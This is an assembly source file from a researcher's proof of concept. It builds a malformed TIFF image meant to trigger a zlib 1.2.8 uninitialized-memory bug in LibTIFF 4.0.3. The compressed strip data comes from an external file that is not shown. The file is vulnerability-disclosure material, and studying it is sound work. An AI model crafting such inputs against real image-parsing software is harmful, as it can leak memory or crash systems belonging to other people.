;
; Zlib 1.2.8 use of uninitialized memory vulnerability
; Proof of Concept exploit for LibTIFF 4.0.3
;
; Author: Mateusz Jurczyk (j00ru.vx@gmail.com)
; Date:   1/17/2014
;

[bits 32]

head:
  ; TIFF Signature.
  db 'II', 42, 00

  ; Offset of the Image File Directory.
  dd (ifd_head - head)

ifd_head:
  ; Number of entries.
  dw (ifd_end - ifd_entries) / 12
  
ifd_entries:
  dw 0x0100 ; Tag:   ImageWidth
  dw 3      ; Type:  SHORT
  dd 1      ; Count: 1
  dd (1 << (BITS / 2)) ; Value

  dw 0x0101 ; Tag:   ImageLength
  dw 3      ; Type:  SHORT
  dd 1      ; Count: 1
  dd (1 << (BITS / 2)) ; Value

  dw 0x0102 ; Tag:   BitsPerSample
  dw 3      ; Type:  SHORT
  dd 1      ; Count: 1
  dd 8      ; Value: 8

  dw 0x0103 ; Tag:   Compression
  dw 3      ; Type:  SHORT
  dd 1      ; Count: 1
  dd 0x80b2 ; Value: 0x80b2 (ZIP)

  dw 0x0106 ; Tag:   PhotometricInterpretation
  dw 3      ; Type:  SHORT
  dd 1      ; Count: 1
  dd 1      ; Value: 1 (8-bpp Palette Image)

  dw 0x0111 ; Tag:   StripOffsets
  dw 4      ; Type:  LONG
  dd 1      ; Count: 1
  dd (strip_data_head - head) ; Value: compressed strip data offset

  dw 0x0112 ; Tag:   Orientation
  dw 3      ; Type:  SHORT
  dd 1      ; Count: 1
  dd 1      ; Value: 1 (top left)

  dw 0x0115 ; Tag:   SamplesPerPixel
  dw 3      ; Type:  SHORT
  dd 1      ; Count: 1
  dd 1      ; Value: 1

  dw 0x0116 ; Tag:   RowsPerStrip
  dw 3      ; Type:  SHORT
  dd 1      ; Count: 1
  dd 256    ; Value: 256 (same as ImageLength)

  dw 0x0117 ; Tag:   StripByteCounts
  dw 4      ; Type:  LONG
  dd 1      ; Count: 1
  dd (strip_data_end - strip_data_head) ; Value: strip data length

  dw 0x011a ; Tag:   XResolution
  dw 5      ; Type:  RATIONAL (LONG LONG)
  dd 1      ; Count: 1
  dd (resolution - head) ; Value: resolution value offset

  dw 0x011b ; Tag:   YResolution
  dw 5      ; Type:  RATIONAL (LONG LONG)
  dd 1      ; Count: 1
  dd (resolution - head) ; Value: resolution value offset

  dw 0x011c ; Tag:   PlanarConfiguration
  dw 3      ; Type:  SHORT
  dd 1      ; Count: 1
  dd 1      ; Value: 1 (Chunky format)

  dw 0x0128 ; Tag:   ResolutionUnit
  dw 3      ; Type:  SHORT
  dd 1      ; Count: 1
  dd 2      ; Value: 2 (inches, arbitrarily chosen)

  dw 0x0140 ; Tag:   ColorMap
  dw 3      ; Type:  SHORT
  dd 256 * 3; Count: 768
  dd (color_map - head) ; Value: color map offset

ifd_end:
  ; There is no further IFD, so next offset=0.
  dd 0

resolution:
  ; Resolution value: 100 (arbitrary)
  dd 200
  dd 1

color_map:
  times 256 db 0, 0, 0

strip_data_head:
  incbin "stream.bin"
strip_data_end:

